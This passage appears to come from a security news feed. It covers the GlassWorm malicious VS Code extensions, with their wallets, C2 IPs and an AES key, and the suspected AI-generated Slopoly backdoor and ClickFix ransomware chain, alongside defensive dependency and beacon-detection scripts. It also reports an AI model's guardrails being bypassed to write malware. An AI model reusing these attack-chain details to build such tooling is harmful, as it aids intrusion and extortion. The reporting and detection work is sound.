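    """Every extension that installs when (ext_id, version) is installed.

    Referenced extensions are resolved at 'latest' because the manifest
    fields name publisher.name only, with no version pin; that is exactly
    why a dependency can turn malicious after the root was reviewed.
    """
    seen: Set[str] = set()
    stack: List[str] = sorted(direct_deps(lookup(ext_id, version)))
    while stack:
        dep = stack.pop()
        if dep in seen:
            continue
        seen.add(dep)
        stack.extend(sorted(direct_deps(lookup(dep, "latest")) - seen))
    return seen


def cross_publisher(ext_id: str, deps: Set[str]) -> Set[str]:
    """Dependencies published under a namespace other than the root's."""
    root_pub = ext_id.split(".", 1)[0]
    return {d for d in deps if d.split(".", 1)[0] != root_pub}


def added_between(ext_id: str, old: str, new: str) -> Set[str]:
    """Transitive installs present in `new` that `old` did not pull in."""
    return transitive_closure(ext_id, new) - transitive_closure(ext_id, old)


if __name__ == "__main__":
    root = "example-pub.helpful-tool"
    print("new installs 1.5.6 -> 1.5.7:", sorted(added_between(root, "1.5.6", "1.5.7")))
    print("cross-publisher installs:", sorted(cross_publisher(root, transitive_closure(root, "1.5.7"))))
```

Any non-empty result from added_between on a version bump is the point at which a re-review is warranted, regardless of how the root extension's own code changed.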

Inflated Downloads and Impersonated Tools 

Many of the malicious open VSX extensions in the GlassWorm campaign impersonate widely used developer tools to increase credibility. These include utilities such as linters, formatters, code runners, and language tools for frameworks, including Angular, Flutter, Python, and Vue.

Other impersonated tools include:
  • vscode-icons 
  • WakaTime 
  • Better Comments 
The campaign also targets AI development tools, including extensions related to Claude Code, Codex, and Antigravity.

Some extensions showed download counts in the thousands, likely manipulated by the threat actor to make the packages appear legitimate. One example, twilkbilk.color-highlight-css, displayed 3.5K reported downloads while impersonating the legitimate color-highlight extension.

In another case, daeumer-web.es-linter-for-vs-code uses a publisher name that is a typosquat of the legitimate ESLint publisher dbaeumer.

As of March 13, 2026, the Open VSX registry removed many of the transitively malicious extensions. However, some listings, including twilkbilk/color-highlight-css and crotoapp/vscode-xml-extension, were still active at the time of analysis, indicating that takedown efforts were ongoing.

GlassWorm Loader Evolution and Infrastructure Changes 

While the distribution method has evolved, the underlying GlassWorm loader retains several recognizable characteristics.

The latest variants still rely on:
  • Staged JavaScript execution 
  • Russian locale and timezone geofencing 
  • Solana transaction memos used as dead drops 
  • In-memory follow-on code execution 
However, several operational changes indicate an effort to improve resilience and evade detection.

For example, the campaign rotated Solana wallet infrastructure from:
  • BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC 
to 
  • 6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ 
The operation also introduced additional command-and-control IP addresses, including: 
  • 45.32.151.157 
  • 70.34.242.255 
At the same time, it continues to reuse 45.32.150.251, suggesting continuity with earlier GlassWorm activity.

Other technical modifications include:
  • Continued use of the Solana memo program MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr 
  • Replacement of the earlier static AES-wrapped loader with heavier RC4, base64, and string-array obfuscation 
  • Relocation of decryption keys from the extension code into HTTP response headers, specifically ivbase64 and secretkey 
Security analysts also highlighted embedded cryptographic indicators, such as: 
  • AES key: wDO6YyTm6DL0T0zJ0SXhUql5Mo0pdlSz
  • AES IV: c4b9a3773e9dced6015a670855fd32b
Hive0163 Ransomware Operators Use AI-Generated Slopoly Malware

Ashish Khaitan, 13 March 2026, 04:13

Researchers have identified a suspected case of AI-generated malware being used during a ransomware attack. The malware, which analysts dubbed "Slopoly," was linked to a financially motivated cybercrime group tracked as Hive0163. The appearance of Slopoly in an active ransomware intrusion suggests that cybercriminal groups are beginning to experiment with AI-generated malware as part of their operational toolkit. 

Hive0163 and the Experimentation with AI-generated Malware 

Hive0163 is a cluster of financially motivated threat actors known for conducting ransomware campaigns that focus on large-scale data theft and extortion. The group has been associated with several global ransomware incidents involving Interlock ransomware, as well as a range of custom backdoors and loaders such as NodeSnake, InterlockRAT, and the JunkFiction loader.

During a ransomware investigation in early 2026, IBM X-Force analysts discovered that Hive0163 deployed Slopoly, a suspected AI-generated malware framework designed to maintain persistent access to a compromised server. According to the investigation, the attackers retained access to the infected machine for more than a week using the malware.

Notably, Slopoly was deployed during the later stages of the attack, suggesting the operators may have been testing the AI-generated framework in a real-world scenario. Researchers described the situation as resembling a “live-fire exercise,” where the threat actors experimented with the new tool during an active operation.

The naming conventions of variables within the script indicated that the system generating the code was explicitly instructed to produce malicious functionality. This suggests that any safety guardrails implemented in the underlying AI model were successfully bypassed. However, researchers were unable to determine which specific model generated Slopoly, although the overall quality suggested it was likely produced by a relatively less advanced system.

Slopoly is a Suspected LLM-generated C2 Tool 

The Slopoly malware was discovered as a PowerShell script on an infected server. Analysis revealed that the script functioned as the client component of a command-and-control (C2) framework used by Hive0163.

Investigators believe the malware was generated through a builder tool that automatically inserted configuration data such as a session ID, mutex name, C2 server address, and beacon intervals. The builder reportedly deployed Slopoly into the directory C:\ProgramData\Microsoft\Windows\Runtime\ and established persistence by creating a scheduled task named “Runtime Broker.”

Several characteristics strongly suggested that Slopoly was produced using a large language model. The script contained extensive comments, structured logging functions, clear error handling routines, and well-named variables, features commonly seen in AI-generated malware and AI-assisted programming.

Another clue pointing to AI-assisted development was the presence of an unused “Jitter” function within the code. Researchers believe this may have been left over from iterative development with an LLM.

Interestingly, the script’s internal comments describe it as a “Polymorphic C2 Persistence Client.” In practice, however, the malware does not exhibit true polymorphic behavior. It cannot modify its own code during execution. Instead, the builder likely generates new variants of the malware with randomized configuration values and function names, a common technique used by malware builders.

How Slopoly Operates on Infected Systems 

Despite its limited technical sophistication, Slopoly operates as a functional backdoor. After execution, it collects basic system information from the infected machine and sends it to a remote command-and-control server.

The data is transmitted in JSON format using an HTTP POST request to the /api/commands endpoint. A typical beacon includes information such as the public IP address of the infected system, the user account name, the computer name, and whether the process is running with elevated privileges.

The malware sends a heartbeat message every 30 seconds and checks for new commands roughly every 50 seconds. Any instructions received from the C2 server are executed using cmd.exe, and the results are returned to the server.

The malware also maintains a detailed log file named persistence.log, which records activity and rotates once it reaches a size of 1 MB.
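Because the Jitter function is unused, the beacon cadence described above is a fixed timer, and fixed-interval POSTs to one path are what a proxy-log periodicity check can key on. The following is an added example, not code from the article or from IBM X-Force: the log lines are constructed, the "timestamp src method host path" layout is a simplification rather than any proxy product's format, and the destination host is a placeholder.

```python
"""Flag fixed-cadence HTTP POST beacons in web-proxy logs, the traffic
shape the article attributes to Slopoly (JSON POSTs to /api/commands on
a timer, with no jitter applied).

Added example. SAMPLE_LOG is constructed; the format is
"timestamp src method host path", one request per line.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Constructed sample: one workstation posting every 30 s to a placeholder
# C2 host, interleaved with ordinary browsing from another workstation.
SAMPLE_LOG = """\
2026-03-01T10:00:00 10.0.0.15 POST c2.example.invalid /api/commands
2026-03-01T10:00:02 10.0.0.22 GET docs.example.org /index.html
2026-03-01T10:00:30 10.0.0.15 POST c2.example.invalid /api/commands
2026-03-01T10:00:41 10.0.0.22 GET docs.example.org /guide.html
2026-03-01T10:01:00 10.0.0.15 POST c2.example.invalid /api/commands
2026-03-01T10:01:30 10.0.0.15 POST c2.example.invalid /api/commands
2026-03-01T10:01:55 10.0.0.22 GET docs.example.org /faq.html
2026-03-01T10:02:00 10.0.0.15 POST c2.example.invalid /api/commands
2026-03-01T10:02:30 10.0.0.15 POST c2.example.invalid /api/commands
"""

Key = Tuple[str, str, str]  # (source IP, destination host, path)


def parse(log: str) -> Dict[Key, List[datetime]]:
    """Group POST request timestamps by (source, host, path)."""
    groups: Dict[Key, List[datetime]] = defaultdict(list)
    for line in log.splitlines():
        ts, src, method, host, path = line.split()
        if method == "POST":  # the article describes POST beacons only
            groups[(src, host, path)].append(datetime.fromisoformat(ts))
    return groups


def find_beacons(log: str, min_hits: int = 5, max_cv: float = 0.1) -> List[dict]:
    """Return groups whose inter-request intervals are nearly constant.

    The coefficient of variation (stdev / mean) of the gaps is close to 0
    for a timer and large for human browsing; max_cv tolerates minor
    network delay. min_hits avoids judging on too few samples.
    """
    findings: List[dict] = []
    for (src, host, path), times in parse(log).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= max_cv:
            findings.append({"src": src, "host": host, "path": path,
                             "period_s": round(avg, 1), "hits": len(times)})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

A reported period near 30 s or 50 s together with the /api/commands path matches the cadence the article gives, but the check itself is cadence-based and does not depend on the path.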

Initial Infection Through ClickFix 

The attack investigated by the researchers began with a social engineering technique known as ClickFix. This method tricks victims into executing malicious PowerShell commands themselves.

Victims are typically shown a CAPTCHA-style verification page that secretly copies a malicious script into the clipboard. The page then instructs users to press a sequence of keyboard commands—“Win+R” to open the Windows Run dialog, followed by “Ctrl+V” to paste the script and “Enter” to execute it.

Once executed, the PowerShell payload installs NodeSnake, a NodeJS-based malware that serves as the first stage of a larger command-and-control framework used by Hive0163.

NodeSnake supports multiple commands, including downloading and executing payloads, running shell commands, establishing persistence, updating itself, or terminating its own process.

In the observed attack, NodeSnake eventually deployed a more advanced JavaScript-based backdoor known as InterlockRAT, which supports WebSocket communications, reverse shell access, and SOCKS5 tunneling capabilities.

Ransomware Deployment and Encryption 

The final stage of the intrusion involved the deployment of Interlock ransomware, packaged using the JunkFiction loader. Once executed, the ransomware scans logical drives and encrypts targeted files across the system.

Interlock uses a combination of AES-GCM encryption and RSA cryptography through the OpenSSL library (version 3.5.0). Each encrypted file receives a unique session key, which is then protected using an attacker-controlled RSA public key.

Encrypted files are typically renamed with extensions such as . !NT3RLOCK or .int3R1Ock. After completing the encryption process, the ransomware drops a ransom note, often named FIRST_READ_ME.txt, containing instructions for victims to contact the attackers.

The State of Cyber Warfare in 2026: Nation-State Attacks, AI Weapons, and the New Digital Battlefield

12 March 2026, 08:52

Cyber operations no longer occur only during wartime. Digital activity now runs continuously alongside diplomacy, sanctions, and military tensions. This has become particularly visible amid escalating hostilities involving Iran, Israel, and the United States, where intelligence agencies have warned of possible retaliatory cyber activity linked to the conflict. In this environment, cyber warfare 2026 is highlighted by persistent nation-state cyberattacks, covert intrusion campaigns, and strategic influence operations.

Governments, telecommunications networks, cloud platforms, and identity systems have become the primary targets. Threat researchers point to three converging factors: ongoing state-sponsored cyber threats, a mature cybercriminal ecosystem that sells infrastructure and access, and automation technologies that enable scalable phishing, impersonation, and cyber espionage 2026 operations.

These dynamics have turned cyberspace into a strategic domain of conflict. Espionage, disruption, influence operations, and financial crime frequently overlap, reflecting the realities of hybrid warfare cybersecurity. As geopolitical tensions rise, organizations face geopolitical cyber risk, where real-world conflicts are mirrored in the digital domain.

Cyber Warfare 2026: What We Know So Far 

From 2025 to 2026, the global threat environment has produced several notable signals indicating how modern cyber conflict is evolving. Threat intelligence monitoring of underground forums revealed multiple offers of high-value system access throughout 2025. Among the widely confirmed events: on January 9, 2026, the cybercrime collective ShinyHunters published a manifesto alongside the leaked database of the BreachForums platform, exposing metadata for 323,986 users, including email addresses, hashed passwords, IP addresses, and registration details. Analysts believe some data may have been intentionally falsified for operational security.

Vulnerability exploitation also intensified. In February 2026, Microsoft patched six actively exploited zero-day vulnerabilities affecting components including SmartScreen, Windows Desktop Window Manager, and Remote Desktop Services. Soon afterward, the U.S. Cybersecurity and Infrastructure Security Agency added VMware Aria Operations vulnerability CVE-2026-22719 to its Known Exploited Vulnerabilities catalog due to confirmed exploitation in the wild.

By March 10, 2026, intelligence reporting warned of potential retaliatory cyber activity connected to escalating tensions involving Iran. Following the warning, cyber activity linked to the conflict increased across the Middle East. After the February 2026 U.S.–Israel strikes against Iranian targets, security researchers reported a surge of retaliatory cyber operations and hacktivist campaigns targeting organizations in Israel, the United States, and allied countries. Analysts tracked dozens of incidents ranging from distributed-denial-of-service attacks and website defacements to alleged data breaches claimed by pro-Iranian and pro-Palestinian hacker groups.

Several groups publicly promoted operations such as “#Op_Israel_USA,” claiming attacks against Israeli telecom services, government websites, and Western organizations. Hacktivist collectives, including Handala Hack and Dark Storm Team, used Telegram and underground forums to claim responsibility for disruptions and alleged system compromises.

Decoding Nation-State Cyberattacks 

China-Linked Cyber Espionage Campaigns 

Strategic espionage remains one of the most consistent features of cyber espionage in 2026. National threat assessments highlight that state actors, including China, are almost certainly attempting to cause a disruptive effect and manipulate industrial control systems in support of broader strategic goals.

Government networks, research institutions, and emerging technology sectors remain priority targets. Telecommunications infrastructure has also become a major collection point because it offers both intelligence visibility and operational leverage.

Threat intelligence summaries from the telecom sector, specifically Cyble’s Telecommunications Sector Threat Landscape Report 2025, documented 444 security incidents and 90 ransomware attacks against telecom companies in 2025 alone. The concentration of activity reinforces telecom networks as a strategic surveillance layer for nation-state cyberattacks.

Russia-Linked Operations and Military Intelligence Campaigns 

Russian cyber operations have remained closely tied to geopolitical conflict, particularly in Europe and regions affected by the war in Ukraine. Security research identified activity consistent with the Russian threat group APT28 targeting government and military entities using a Microsoft Office vulnerability, CVE-2026-21509. The campaign reportedly involved a multi-stage attack chain designed to remain stealthy during post-exploitation phases.

Another example involved attackers weaponizing a previously patched WinRAR vulnerability (CVE-2025-8088). Even after patches become available, such flaws frequently remain exploitable due to slow enterprise patch adoption, making them attractive tools in state-sponsored cyber threats.

North Korea and Financially Motivated Cyber Operations 

North Korean cyber activity continues to blur the line between espionage and organized crime. One of the most widely reported examples involved the attribution of a $1.5 billion cryptocurrency theft from Bybit in February 2025 to the Lazarus Group.

Financial theft serves both economic and strategic purposes for the North Korean state. At the same time, identity-based fraud has become another operational method.

The New Digital Battlefield 

Critical infrastructure remains a primary target in cyber warfare 2026, with industrial control systems (ICS) and operational technology networks at high risk of manipulation by state actors to disrupt public administration, utilities, and transportation systems.

While detailed technical disclosures of confirmed sabotage are limited, attackers increasingly focus on cloud and identity systems, exploiting stolen credentials, authentication tokens, and legitimate administrative tools to move laterally and gain broad access.

Supply chains further amplify systemic risk, as compromises of third-party vendors can cascade across multiple organizations, making supply-chain attacks an efficient vector for nation-state cyberattacks, particularly against critical infrastructure and government networks.

AI and the Evolution of Cyber Operations 

Artificial intelligence is reshaping the cyber threat landscape, although its direct role in confirmed state operations remains difficult to measure.

Threat intelligence monitoring shows the rise of Deepfake-as-a-Service markets and advertisements offering identity verification bypass tools or synthetic video generation. In 2025, deepfakes were involved in more than 30 percent of high-impact corporate impersonation attacks.

Phishing campaigns are also becoming more automated. The CCAPAC Annual Report 2025 indicates that 82.6 percent of phishing emails now contain AI-generated elements, enabling attackers to scale highly convincing impersonation attempts.

Malware development may also be changing. Security researchers have reported experimental malware families capable of modifying behavior during attacks using language-model-based components. While technical documentation remains limited, such developments hint at how automation could shape future cyber warfare 2026 strategies.

Another area of rapid change is vulnerability discovery. AI-assisted code analysis has already demonstrated the ability to locate hundreds of severe software vulnerabilities in open-source projects within short timeframes, accelerating both defensive research and offensive exploitation.

The Vulnerability Landscape Driving Modern Cyber Conflict 

Software vulnerabilities remain one of the most reliable entry points for attackers.

Examples from 2026 include:
  • CVE-2026-24423, a remote code execution vulnerability in SmarterMail exploited in ransomware campaigns. 
  • CVE-2026-22719, a VMware Aria Operations command-injection flaw actively exploited in the wild. 
  • CVE-2026-2441, the first actively exploited Chrome zero-day reported in 2026. 
Security researchers documented 90 zero-day vulnerabilities exploited in 2025, nearly half of which targeted enterprise technology systems. The pace of discovery continues to accelerate. One vulnerability monitoring report tracked 1,782 vulnerabilities disclosed in a single week, including 282 public proof-of-concept exploits. This quick weaponization cycle increases geopolitical cyber risk, as attackers can quickly convert newly discovered flaws into operational tools. 

Conclusion 

In 2026, digital conflict is a permanent part of global competition, with state-sponsored cyber threats exploiting supply chains, identity systems, and critical infrastructure to expand geopolitical risk. Criminal ecosystems further blur espionage and financially motivated attacks, complicating attribution. Cyble delivers AI-powered threat intelligence and autonomous defense through platforms like Cyble Blaze AI, giving organizations real-time visibility, automated protection, and proactive mitigation. Book a personalized demo today to stay protected from modern cyber threats. 
